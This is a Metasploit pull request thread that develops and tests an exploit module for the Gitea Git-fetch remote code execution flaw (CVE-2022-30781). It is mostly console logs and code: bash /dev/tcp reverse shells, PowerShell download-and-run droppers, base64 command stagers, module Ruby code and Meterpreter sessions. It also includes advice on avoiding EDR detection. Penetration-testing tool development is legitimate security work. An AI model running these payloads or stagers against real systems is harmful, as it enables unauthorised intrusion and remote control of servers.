Add Gitea Git fetch RCE module - CVE-2022-30781
rapid7/metasploit-framework pull request #17021
Opened 2022-09-15 12:56 UTC by krastanoel

This module exploits Git fetch command in Gitea repository migration process that leads to a remote command execution on the system. This vulnerability affect Gitea before 1.16.7 version.

[Docker installation](https://docs.gitea.io/en-us/install-with-docker/#basics)
```
:~$ docker-compose up
:~$ cat << EOF >> gitea/gitea/conf/app.ini
> [migrations]
> ALLOW_LOCALNETWORKS = true
> EOF
```

## Verification

List the steps needed to make sure this thing works

- [ ] Navigate to `/user/sign_up` and register normal user
- [ ] Start `msfconsole`
- [ ] `use unix/webapp/gitea_git_fetch_rce`
- [ ] `set RHOSTS [ips]`
- [ ] `set LHOST [lhost]`
- [ ] `set USERNAME [username]`
- [ ] `set PASSWORD [password]`
- [ ] `run`
- [ ] **Verify** the module should get a shell.

## Demo
```
msf6 > use unix/webapp/gitea_git_fetch_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(unix/webapp/gitea_git_fetch_rce) > set RHOSTS 172.17.0.2
RHOSTS => 172.17.0.2
msf6 exploit(unix/webapp/gitea_git_fetch_rce) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(unix/webapp/gitea_git_fetch_rce) > set USERNAME msf
USERNAME => msf
msf6 exploit(unix/webapp/gitea_git_fetch_rce) > set PASSWORD qwerty
PASSWORD => qwerty
msf6 exploit(unix/webapp/gitea_git_fetch_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(unix/webapp/gitea_git_fetch_rce) > run

[+] bash -c '0<&180-;exec 180<>/dev/tcp/172.17.0.1/4444;sh <&180 >&180 2>&180'
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/gitea_git_fetch_rce) >
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://172.17.0.1:8080/msf/eqESXv4b
[*] Server started.
[*] Adding hardcoded uri /api/v1/version
[*] Adding hardcoded uri /api/v1/settings/api
[*] Adding hardcoded uri /api/v1/repos/msf/eqESXv4b
[*] Adding hardcoded uri /api/v1/repos/msf/eqESXv4b/pulls
[*] Adding hardcoded uri /api/v1/repos/msf/eqESXv4b/topics
[*] Creating repository "7vX49Gy2Rui5WHQ"
[+] Repository created
[*] Migrating repository
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:50212) at 2022-09-15 18:51:31 +0700
[*] Cleanup: removing repository "7vX49Gy2Rui5WHQ"
[*] Cleanup: removing repository "eqESXv4b"
[*] Server stopped.

msf6 exploit(unix/webapp/gitea_git_fetch_rce) > sessions 1
[*] Starting interaction with 1...

id
uid=1000(git) gid=1000(git) groups=1000(git),1000(git)
```

2022-09-20 16:22 UTC, cdelafuente-r7 reviewed
Thanks @krastanoel for this great module! I left a few comments and suggestions for you to review when you get a chance.

Also, I noticed this module has some similar logics from the other `Gitea Hook RCE` [module](https://github.com/cdelafuente-r7/metasploit-framework/blob/master/modules/exploits/multi/http/gitea_git_hooks_rce.rb). Methods like `get_csrf `, `gitea_create_repo` and `gitea_login` seem to be similar. I think it would be a good idea to move these to a common [library](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core/exploit/remote/http/) and use it in both modules to avoid code duplication. If you choose to do so, I would recommend to update the other module in a separate PR.

2022-09-30 10:07 UTC, rzevtin commented on modules/exploits/unix/webapp/gitea_git_fetch_rce.rb
> +    fail_with(Failure::UnexpectedReply, 'Unable to get CSRF token') unless csrf
I do not realize these and totally miss it. I'm unable to find ways to handle these via custom exception in msf docs so I've handle each caller separately. Is it okay?

2022-09-30 10:12 UTC, krastanoel commented on modules/exploits/unix/webapp/gitea_git_fetch_rce.rb
> +    fail_with(Failure::UnexpectedReply, 'Unable to get CSRF token') unless csrf
I do not realize these and totally miss it. I'm unable to find ways to handle these via custom exception in msf docs so I've handle each caller separately.

2022-09-30 10:13 UTC, krastanoel commented on modules/exploits/unix/webapp/gitea_git_fetch_rce.rb
> +    return CheckCode::Unknown('Could not connect to the web service')
Yep. You got me, I straight up to copy-paste this from check method :joy:

2022-09-30 10:14 UTC, krastanoel commented on documentation/modules/exploit/unix/webapp/gitea_git_fetch_rce.md
> +## Options
Thank you, I've updated the description.

2022-09-30 10:17 UTC, krastanoel commented
@cdelafuente-r7 Thank you for reviewing the module. I've been away and caught up with some other works but will continue to work on this module I hope that's okay.

2022-10-01 11:20 UTC, krastanoel commented on modules/exploits/unix/webapp/gitea_git_fetch_rce.rb
> +            }
Thanks for the hint! This is the first time I use `cmdstager` thanks to the wonderful [docs](https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html) so I think [this](https://github.com/rapid7/metasploit-framework/pull/17021/files#diff-bdefb15e362dadccad8077a7b0e90b6884f4bfed0f962bdac2e18e74f19a96d4R139) now works.

```
msf6 exploit(unix/webapp/gitea_git_fetch_rce) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://172.17.0.1:8080/
[*] Server started.
[*] Adding hardcoded uri /api/v1/version
[*] Adding hardcoded uri /api/v1/settings/api
[*] Adding hardcoded uri /api/v1/repos/msf/dxEChHOg8FCT
[*] Adding hardcoded uri /api/v1/repos/msf/dxEChHOg8FCT/pulls
[*] Adding hardcoded uri /api/v1/repos/msf/dxEChHOg8FCT/topics
[*] Creating repository "hObjpJ6Do"
[+] Repository created
[*] Generated command stager: ["echo -n f0VM...]
[*] Executing command: echo -n f0VMRgIBAQAAA...'
[*] Command Stager progress - 100.00% done (833/833 bytes)
[*] Migrating repository
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:48478) at 2022-10-01 17:47:22 +0700
[*] Server stopped.

meterpreter > getuid
Server username: git
```

2022-10-01 11:20 UTC, krastanoel commented on modules/exploits/unix/webapp/gitea_git_fetch_rce.rb
> +    fail_with(Failure::UnexpectedReply, 'Unable to get CSRF token') unless csrf
I've updated the module so now use its a [custom error](https://github.com/rapid7/metasploit-framework/pull/17021/files#diff-e5849d5e53187707e5e14c49c0266c85d02421da8cb85e2df4ae0da1467db151R12)

2022-10-01 11:20 UTC, krastanoel commented on modules/exploits/unix/webapp/gitea_git_fetch_rce.rb
> +    @migrate_repo_path = "#{datastore['username']}/#{@migrate_repo_name}"
I've check for empty string and set it default to [msf](https://github.com/rapid7/metasploit-framework/pull/17021/files#diff-bdefb15e362dadccad8077a7b0e90b6884f4bfed0f962bdac2e18e74f19a96d4R170)

2022-10-01 11:21 UTC, krastanoel commented on modules/exploits/unix/webapp/gitea_git_fetch_rce.rb
> +    datastore['URIPATH'] = "/#{@migrate_repo_path}"
Thanks I've remove the line and set the default to `/`

2022-10-01 11:21 UTC, krastanoel commented on modules/exploits/unix/webapp/gitea_git_fetch_rce.rb
> +  def exploit
I've check if user set the `AutoCheck` to `false`

2022-10-01 11:21 UTC, krastanoel commented on modules/exploits/unix/webapp/gitea_git_fetch_rce.rb
> +            'Unix Command',
Yeah I know this has been bugged me too. Unfortunately I still can't figured out why the module won't work on Windows.
```
msf6 exploit(multi/http/gitea_git_fetch_rce) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.0.104:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://192.168.0.104:8080/ZkARSaEz01
[*] Server started.
[*] Adding hardcoded uri /api/v1/version
[*] Adding hardcoded uri /api/v1/settings/api
[*] Adding hardcoded uri /api/v1/repos/msf/yMxHkTQ
[*] Adding hardcoded uri /api/v1/repos/msf/yMxHkTQ/pulls
[*] Adding hardcoded uri /api/v1/repos/msf/yMxHkTQ/topics
[*] Creating repository "HU6WGuq"
[+] Repository created
[*] Using URL: http://192.168.0.104:8080/XFiSZmubHCz
[*] Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile %TEMP%\\REICBwml.exe http://192.168.0.104:8080/XFiSZmubHCz & %TEMP%\\REICBwml.exe & del%TEMP%\\REICBwml.exe"]
[*] Executing command: powershell.exe -c Invoke-WebRequest -OutFile %TEMP%\REICBwml.exe http://192.168.0.104:8080/XFiSZmubHCz & %TEMP%\REICBwml.exe & del %TEMP%\REICBwml.exe
[*] Command Stager progress - 100.00% done (152/152 bytes)
[*] Migrating repository
[*] Exploit completed, but no session was created.
```

2022-10-11 15:45 UTC, cdelafuente-r7 requested changes
Thanks @krastanoel for refactoring this module! This is really great to have a library for Gitea now. This will be certainly useful for future exploits.

I tested the module against a docker installation and it works great, as long as the payload fit in one request. Using a bigger payload will fail (e.g. a stageless payload like `linux/x64/meterpreter_reverse_tcp`). Please see my comments below. I'll also test against a Windows host and check the issue you reported.

In the meantime, I left some comments and suggestions for review.

2022-11-07 15:18 UTC, cdelafuente-r7 commented
Hi @krastanoel , I just wanted to check if you need any help to address the last comments. I believe this module can land quickly after these last changes are made.

Also, I tested against Gitea on Windows and confirmed the issue with a newer version of Git. However, I coud not reproduce the `cmdstager` error since there is no Windows specific target for this. I believe this target is missing:
```
          [
            'Windows Dropper',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :win_dropper,
              'DefaultOptions' => {
                'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,
                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
              }
            }
          ],
```
You will also need to handle this target correctly in the code to make sure characters are properly escaped to not break the JSON in the HTTP response.

2022-11-09 11:15 UTC, krastanoel commented on lib/msf/core/exploit/remote/http/gitea/login.rb
> +    raise Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError.new if res&.code != 302
In my understanding because the use of safe negation operator in `res&` the exception will be raised no?
```
msf6 exploit(multi/http/gitea_git_fetch_rce) > irb
[*] Starting IRB shell...
[*] You are in exploit/multi/http/gitea_git_fetch_rce

>> res = nil
=> nil
>> raise Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError.new if res&.code != 302
(irb):2:in `<main>': Authentication failed (Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError)
        from /home/msf/git/metasploit-framework/lib/rex/ui/text/irb_shell.rb:53:in `block in run'
        ...
```

2022-11-09 11:15 UTC, krastanoel commented on lib/msf/core/exploit/remote/http/gitea/repository.rb
> +  # creation, nil otherwise
Thanks, the exceptions is added.

2022-11-09 11:16 UTC, krastanoel commented on modules/exploits/multi/http/gitea_git_fetch_rce.rb
> +    "#{datastore['username'].presence || 'msf'}/#{name}"
Yes I've validate if the username is `blank?` before even try to login in both method `check` and `exploit` (if autocheck set to false)

2022-11-09 11:16 UTC, krastanoel commented on modules/exploits/multi/http/gitea_git_fetch_rce.rb
> +  end
Yes, the suggestion works well. I'm also realize that the `cleanup` method is also called when user would run `check` manually, that's align with instance variable you suggest as a flag for created and migrated repository. Now the `cleanup` method will just return if user run `check` but will trigger upon finished `run` (success or fail).

2022-11-09 11:16 UTC, krastanoel commented on modules/exploits/multi/http/gitea_git_fetch_rce.rb
> +    cleanup # removing all resources
Thanks, it's removed.

2022-11-09 11:16 UTC, krastanoel commented on modules/exploits/multi/http/gitea_git_fetch_rce.rb
> +    gitea_migrate_repo(@migrate_repo_name, uid, clone_url, auth_token)
I'm not sure how to solve this one. I've moved `gitea_migrate_repo` to `execute_command` and works well with staged payload but no success with stageless. Apparently Gitea instance will fail this if the repository is already exist.
```
msf6 exploit(multi/http/gitea_git_fetch_rce) > set payload linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/http/gitea_git_fetch_rce) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.65.104:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://192.168.65.104:8080/
[*] Executing command: echo -n f0VMRgIB...>>'/tmp/XSOwf.b64'
[*] Command Stager progress -   0.15% done (2046/1407904 bytes)
[*] Executing command: echo -n AAAAAAAI...>>'/tmp/XSOwf.b64'
[-] Exploit failed: Msf::Exploit::Remote::HTTP::Gitea::Error::MigrationError The repository name is already used.
[*] Server stopped.
[*] Exploit completed, but no session was created.
```
So I thought to catch the exception and check for the string `already used` and if it's a stageless payload, then simply delete the repository, `sleep(1)` and `retry` but the command stager progress would take a long time, almost like 15 to 20 minutes or more but I wait to only found no sessions was created.
I suspect it's probably because how the payload was deliver so I watch and make a duplicate of the base64 file in /tmp before the last command is executed and remove the file.
```
bash-5.1# while true; do cp EkMpj.b64 shell.b64; done
cp: can't stat 'EkMpj.b64': No such file or directory
...
```
And try execute it manually just like the module did.
```
bash-5.1# cp shell.b64 EkMpj.b64
bash-5.1# ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/kRHeG' < '/tmp/EkMpj.b64' ; chmod +x '/tmp/kRHeG' ; '/tmp/kRHeG' & sleep 2 ; rm -f '/tmp/kRHeG' ; rm -f '/tmp/EkMpj.b64'
[1] 30650
[1]+  Segmentation fault      '/tmp/kRHeG'
```
I think it's likely because the base64 file is incomplete because the file bytes size is different with the stager.
If I don't use `sleep` then the module will fail at only 7% to 10% progress, with or without `retry` is also the same.
I'm thinking of using a different repository name each time we call `gitea_migrate_repo(name)` just to skip the deletion request and no `sleep`, the name would be randomly generated and pushed to an array until the stager progress completed and then remove all of them in the `cleanup`. I doubt this would work but what do you think?

2022-11-09 11:48 UTC, krastanoel commented
> Hi @krastanoel , I just wanted to check if you need any help to address the last comments. I believe this module can land quickly after these last changes are made.
> 
> Also, I tested against Gitea on Windows and confirmed the issue with a newer version of Git. However, I coud not reproduce the `cmdstager` error since there is no Windows specific target for this. I believe this target is missing:
> 
> ```
>           [
>             'Windows Dropper',
>             {
>               'Platform' => 'win',
>               'Arch' => [ARCH_X86, ARCH_X64],
>               'Type' => :win_dropper,
>               'CmdStagerFlavor' => [ 'psh_invokewebrequest' ],
>               'DefaultOptions' => {
>                 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
>               }
>             }
>           ],
> ```
> 
> You will also need to handle this target correctly in the code to make sure characters are properly escaped to not break the JSON in the HTTP response.
> 
> EDIT: It is actually recommended to use `CmdStagerFlavor` instead of defining the `CMDSTAGER::FLAVOR` default option for both Linux and Windows dropper targets. I've updated the code above to reflect that. You can also completely remove this and let the Framework select it automatically based on the Platform. It's up to you.

Yes, I realize I left out that target, I've added the target now and these are a few notes for you when you try reproduce this.
When using the `:win_droper` this error would likely appeared.
```
msf6 exploit(multi/http/gitea_git_fetch_rce) > rerun
...
[*] Using URL: http://192.168.65.104:8080/
[-] Exploit failed: Rex::RuntimeError The supplied resource '/' is already added.
[*] Exploit completed, but no session was created.
```
The Powershell flavor is trying to add `/` resource which already exist. Configuring the `CMDSTAGER::URIPATH` will solve this. I've also set the `CMDSTAGER::URIPATH` to `/payloads` by default in the target `DefaultOptions` [here](https://github.com/rapid7/metasploit-framework/pull/17021/commits/639afebe1e687915a59dcd2ef8598017cb0c93e6#diff-ea02e8d7884f3972d1b79823b878d1f3b63e394e612373cf5cb61b9baef063eeR83).
```
msf6 exploit(multi/http/gitea_git_fetch_rce) > set CMDSTAGER::URIPATH /payloads
CMDSTAGER::URIPATH => /payloads
msf6 exploit(multi/http/gitea_git_fetch_rce) > run

[*] Started reverse TCP handler on 192.168.65.104:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://192.168.65.104:8080/
[*] Adding hardcoded uri /api/v1/version
[*] Adding hardcoded uri /api/v1/settings/api
[*] Adding hardcoded uri /api/v1/repos/msf/npVRRG1O
[*] Adding hardcoded uri /api/v1/repos/msf/npVRRG1O/pulls
[*] Adding hardcoded uri /api/v1/repos/msf/npVRRG1O/topics
[*] Creating repository "TL2iFjBj"
[+] Repository created
[*] Using URL: http://192.168.65.104:8080/payloads
[*] Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile %TEMP%\\NnlzoIFF.exe http://192.168.65.104:8080/payloads & %TEMP%\\NnlzoIFF.exe & del %TEMP%\\NnlzoIFF.exe"]
[*] Executing command: powershell.exe -c Invoke-WebRequest -OutFile %TEMP%\NnlzoIFF.exe http://192.168.65.104:8080/payloads & %TEMP%\NnlzoIFF.exe & del %TEMP%\NnlzoIFF.exe
[*] Migrating repository
[*] Command Stager progress - 100.00% done (149/149 bytes)
[*] Successfully cleanup repository 'TL2iFjBj'
[!] Repository 'npVRRG1O' not found, possibly already deleted
[*] Exploit completed, but no session was created.
```
Once you do, pay attention to the target Gitea instance running in the command prompt, you will see `fatal: Could not read from remote repository.` and the ` './': del:command not found` error.

In the meantime, the changes requested (minus the stageless payload) is now works well on Linux dropper and command. 
```
msf6 exploit(multi/http/gitea_git_fetch_rce) > run

[*] Started reverse TCP handler on 192.168.65.104:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://192.168.65.104:8080/
[*] Adding hardcoded uri /api/v1/version
[*] Adding hardcoded uri /api/v1/settings/api
[*] Adding hardcoded uri /api/v1/repos/msf/obArY7d
[*] Adding hardcoded uri /api/v1/repos/msf/obArY7d/pulls
[*] Adding hardcoded uri /api/v1/repos/msf/obArY7d/topics
[*] Creating repository "gHpHsXQsMf"
[+] Repository created
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAA...]
[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgAB...
[*] Migrating repository
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 192.168.65.1
[*] Meterpreter session 1 opened (192.168.65.104:4444 -> 192.168.65.1:41276) at 2022-11-09 16:02:36 +0700
[*] Command Stager progress - 100.00% done (833/833 bytes)
[*] Server stopped.
[*] Successfully cleanup repository 'gHpHsXQsMf'
[*] Successfully cleanup repository 'obArY7d'

meterpreter > getuid
Server username: git
meterpreter > exit
[*] Shutting down Meterpreter...
...
msf6 exploit(multi/http/gitea_git_fetch_rce) > set target 0
target => 0
msf6 exploit(multi/http/gitea_git_fetch_rce) > run

[+] bash -c '0<&204-;exec 204<>/dev/tcp/192.168.65.104/4444;sh <&204 >&204 2>&204'
[*] Started reverse TCP handler on 192.168.65.104:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://192.168.65.104:8080/
[*] Adding hardcoded uri /api/v1/version
[*] Adding hardcoded uri /api/v1/settings/api
[*] Adding hardcoded uri /api/v1/repos/msf/iqawppnXVP
[*] Adding hardcoded uri /api/v1/repos/msf/iqawppnXVP/pulls
[*] Adding hardcoded uri /api/v1/repos/msf/iqawppnXVP/topics
[*] Creating repository "lg4mKvp8XI"
[+] Repository created
[*] Executing command: bash -c '0<&126-;exec 126<>/dev/tcp/192.168.65.104/4444;sh <&126 >&126 2>&126'
[*] Migrating repository
[*] Command shell session 2 opened (192.168.65.104:4444 -> 192.168.65.1:41524) at 2022-11-09 16:35:30 +0700
[*] Server stopped.
[*] Successfully cleanup repository 'lg4mKvp8XI'
[*] Successfully cleanup repository 'iqawppnXVP'

id
uid=1000(git) gid=1000(git) groups=1000(git),1000(git)
```

Windows command.
```
msf6 exploit(multi/http/gitea_git_fetch_rce) > set rhosts 192.168.65.21
rhosts => 192.168.65.21
msf6 exploit(multi/http/gitea_git_fetch_rce) > set target 2
target => 2
msf6 exploit(multi/http/gitea_git_fetch_rce) > run

[*] Started reverse TCP handler on 192.168.65.104:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://192.168.65.104:8080/
[*] Adding hardcoded uri /api/v1/version
[*] Adding hardcoded uri /api/v1/settings/api
[*] Adding hardcoded uri /api/v1/repos/msf/jgdjLuobJNB
[*] Adding hardcoded uri /api/v1/repos/msf/jgdjLuobJNB/pulls
[*] Adding hardcoded uri /api/v1/repos/msf/jgdjLuobJNB/topics
[*] Creating repository "lvSodoia"
[+] Repository created
[*] Executing command: powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object ..."
[*] Migrating repository
[*] Powershell session session 3 opened (192.168.65.104:4444 -> 192.168.65.21:49547) at 2022-11-09 16:32:18 +0700
[*] Successfully cleanup repository 'lvSodoia'
[*] Successfully cleanup repository 'jgdjLuobJNB'

PS C:\Users\Administrator\Downloads\data\gitea-repositories\msf\jgdjluobjnb.git>
```

2022-11-09 11:53 UTC, krastanoel commented on lib/msf/core/exploit/remote/http/gitea/base.rb
> +  def gitea_and_online?
Thanks, I've implement the 2nd option [here](https://github.com/rapid7/metasploit-framework/pull/17021/commits/52d867bbc7231dc190b250b906cd4a585dc74aed)

2022-11-09 11:55 UTC, krastanoel commented on modules/exploits/multi/http/gitea_git_fetch_rce.rb
> +    end
Thank you, my copy-paste bad habit. All cookie jar related has been removed.

2022-11-09 18:14 UTC, cdelafuente-r7 commented on lib/msf/core/exploit/remote/http/gitea/login.rb
> +    raise Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError.new if res&.code != 302
Yes, you're absolutely right, I read it too fast, my bad. `res&.code` will be evaluated to `nil` and `nil != 302`, so the exception will be correctly raised. Please, disregard my comment. Sorry about that.

2022-11-09 18:19 UTC, cdelafuente-r7 commented on lib/msf/core/exploit/remote/http/gitea/repository.rb
> +    raise Msf::Exploit::Remote::HTTP::Gitea::Error::RepositoryError.new('Unable to create repo') if res&.code != 302
Same here, please disregard this comment.

2022-11-10 18:37 UTC, cdelafuente-r7 commented
Thanks for updating this. It looks good to me now.

Regarding the issues you reported:
- stageless payload: you're right, the exploit doesn't seem to work with multiple commands this way. I think you should try to redo the full process for each command. In other words, each time `execute_command` is called, migrate to execute the command and then cleanup everything (removing the repos for a fresh start). This might not be possible, but it is worth a try.

- Windows dropper: after testing on my environment, I found out Gitea process pass the command to `C:\Program Files\Git\usr\bin\sh.exe` and not `cmd`. This has a few consequences: `%TEMP%` is not expended, `&` does not work like with `cmd` and backslashed need to be escaped multiple times. I managed to make it work with something like this:

original command:
```
powershell.exe -c Invoke-WebRequest -OutFile %TEMP%\fbgTSXwH.exe http://192.168.144.1:8080/payloads & %TEMP%\fbgTSXwH.exe & del %TEMP%\fbgTSXwH.exe
```

modified command:
```
powershell.exe -c Invoke-WebRequest -OutFile $TEMP\\\fbgTSXwH.exe http://192.168.144.1:8080/payloads && $TEMP\\\fbgTSXwH.exe && del $TEMP\\\fbgTSXwH.exe
```

This might not be a solution unless the user is forced to use the `cmdstager`'s `psh_invokewebrequest` flavor. There might be a lot of other specific statements that won't work with `sh.exe`. Maybe the `cmdstager` is not a good solution here. It is up to you if you want to continue investigating and find a good way to use it.

Finally, the `psh_invokewebrequest` `cmdstager`'s flavor needs a local web server to deliver the payload (and probably other flavors need it too). So, since your module is already running a web server up on `http://<lhost>:8080/` it will conflict with the web server the `cmdstager` is starting. By default, it uses the same configuration (`SRVHOST` and `SRVPORT`). Setting `CMDSTAGER::URIPATH` is one option, but would you mind using a random string instead of `payloads`? We usually avoid using hardcoded values to reduce the chance to be picked by EDR's.

2022-11-11 14:28 UTC, krastanoel commented
>     * stageless payload: you're right, the exploit doesn't seem to work with multiple commands this way. I think you should try to redo the full process for each command. In other words, each time `execute_command` is called, migrate to execute the command and then cleanup everything (removing the repos for a fresh start). This might not be possible, but it is worth a try.

I've just tried this and yes It's still not worked. I modified the module like this.
```
  ...
  def primer
    [
      '/api/v1/version', '/api/v1/settings/api',
      "/api/v1/repos/#{@migrate_repo_path}",
      "/api/v1/repos/#{@migrate_repo_path}/pulls",
      "/api/v1/repos/#{@migrate_repo_path}/topics"
    ].each { |uri| hardcoded_uripath(uri) } # adding resources
  end

  def execute_command(cmd, _opts = {})
    print_status("Executing command: #{cmd}")
    @p = cmd

    @repo_name = rand_text_alphanumeric(6..15)
    @migrate_repo_name = rand_text_alphanumeric(6..15)
    @migrate_repo_path = repo_path(@migrate_repo_name)
    @payload_delivered = false

    vprint_status("Creating repository \"#{@repo_name}\"")
    @uid = gitea_create_repo(@repo_name)
    vprint_good('Repository created')
    vprint_status('Migrating repository')
    clone_url = "http://#{srvhost_addr}:#{srvport}/#{@migrate_repo_path}"
    auth_token = rand_text_alphanumeric(6..15)
    @migrate_repo_created = gitea_migrate_repo(@migrate_repo_name, @uid, clone_url, auth_token)

    # removing repo only after the payload is delivered
    until @payload_delivered
      sleep(0.1)
    end
    gitea_remove_repo(repo_path(@repo_name))
    gitea_remove_repo(repo_path(@migrate_repo_name))
    print_status("Successfully cleanup repository '#{@repo_name}' and '#{@migrate_repo_name}'")
  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::MigrationError,
         Msf::Exploit::Remote::HTTP::Gitea::Error::RepositoryError,
         Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError => e
    fail_with(Failure::UnexpectedReply, e.message)
  end

  def on_request_uri(cli, req)
    case req.uri
    ...
    when "/api/v1/repos/#{@migrate_repo_path}"
      @payload_delivered = true
      data = {
        clone_url: "#{full_uri}#{datastore['username']}/#{@repo_name}",
        owner: { login: datastore['username'] }
      }
      send_response(cli, data.to_json)
  ...
  end
end
```
If the module doesn't `sleep` until the instance variable `@payload_delivered` is `true`, then the staged payload will not work because the repository will be removed before the client access our `on_request_uri` method. It's also take up to 40 minutes to finished with stageless payload but no session was created.
```
msf6 exploit(multi/http/gitea_git_fetch_rce) > date
[*] exec: date

Fri Nov 11 17:41:23 UTC 2022
msf6 exploit(multi/http/gitea_git_fetch_rce) > rerun
[*] Reloading module...
...
[*] Successfully cleanup repository '9FRSRfxq' and 'tWGgMOoKc3'
[*] Command Stager progress -  99.84% done (1405602/1407904 bytes)
[*] Executing command: echo -n AAAA...>>'/tmp/WZOeO.b64'
[*] Successfully cleanup repository 'b2jhVw' and 'h7ZX07x'
[*] Command Stager progress -  99.97% done (1407436/1407904 bytes)
[*] Executing command: ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/NqBWI' < '/tmp/WZOeO.b64' ; chmod +x '/tmp/NqBWI' ; '/tmp/NqBWI' & sleep 2 ; rm -f '/tmp/NqBWI' ; rm -f '/tmp/WZOeO.b64'
[*] Successfully cleanup repository '8kd8s5tay' and 'WTpsi33Am9b'
[*] Command Stager progress - 100.00% done (1407904/1407904 bytes)
[*] Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/gitea_git_fetch_rce) > date
[*] exec: date

Fri Nov 11 18:19:27 UTC 2022
```
At this point I'm not sure if this implementation should be commit? I would like to ask you first before doing it. I feel like like since this will not worked it should not be commited but user should at least know that using a bigger payload will not worked so I have no idea how to proceed with this one.

>     * Windows dropper: after testing on my environment, I found out Gitea process pass the command to `C:\Program Files\Git\usr\bin\sh.exe` and not `cmd`. This has a few consequences: `%TEMP%` is not expended, `&` does not work like with `cmd` and backslashed need to be escaped multiple times. I managed to make it work with something like this:
> 
> 
> original command:
> 
> ```
> powershell.exe -c Invoke-WebRequest -OutFile %TEMP%\fbgTSXwH.exe http://192.168.144.1:8080/payloads & %TEMP%\fbgTSXwH.exe & del %TEMP%\fbgTSXwH.exe
> ```
> 
> modified command:
> 
> ```
> powershell.exe -c Invoke-WebRequest -OutFile $TEMP\\\fbgTSXwH.exe http://192.168.144.1:8080/payloads && $TEMP\\\fbgTSXwH.exe && del $TEMP\\\fbgTSXwH.exe
> ```
> 
> This might not be a solution unless the user is forced to use the `cmdstager`'s `psh_invokewebrequest` flavor. There might be a lot of other specific statements that won't work with `sh.exe`. Maybe the `cmdstager` is not a good solution here. It is up to you if you want to continue investigating and find a good way to use it.
> 
Oh wow this was cool! I didn't realize that doing `$TEMP\\\fbgTSXwH.exe` would worked. However, in my case I got this error on the target.
```
2022/11/11 20:58:43 ...ns/gitea_uploader.go:674:newPullRequest() [E] Fetch branch from ./ failed: exit status 128 - Invoke-WebRequest : Could not find a part of the path \015
        'C:\Users\Administrator\Downloads\data\gitea-repositories\msf\8ldjc7sympf.git\%TEMP%\DxBaeDbo.exe'.\015
        At line:1 char:1\015
        + Invoke-WebRequest -OutFile %TEMP%\DxBaeDbo.exe http://192.168.120.104 ...\015
```
So I have to replace `%TEMP%` altogether.
```
  def execute_command(cmd, _opts = {})
    @p = cmd
    if target['Type'] == :win_dropper
      @p.gsub!(/%TEMP%\\/,"\\\\\\\\\\")
      @p.gsub!(/&/,'&&')
    end
    print_status("Executing command: #{@p}")
    ...
  end

msf6 exploit(multi/http/gitea_git_fetch_rce) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.65.104:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://192.168.65.104:8080/
[*] Adding hardcoded uri /api/v1/version
[*] Adding hardcoded uri /api/v1/settings/api
[*] Adding hardcoded uri /api/v1/repos/
[*] Adding hardcoded uri /api/v1/repos//pulls
[*] Adding hardcoded uri /api/v1/repos//topics
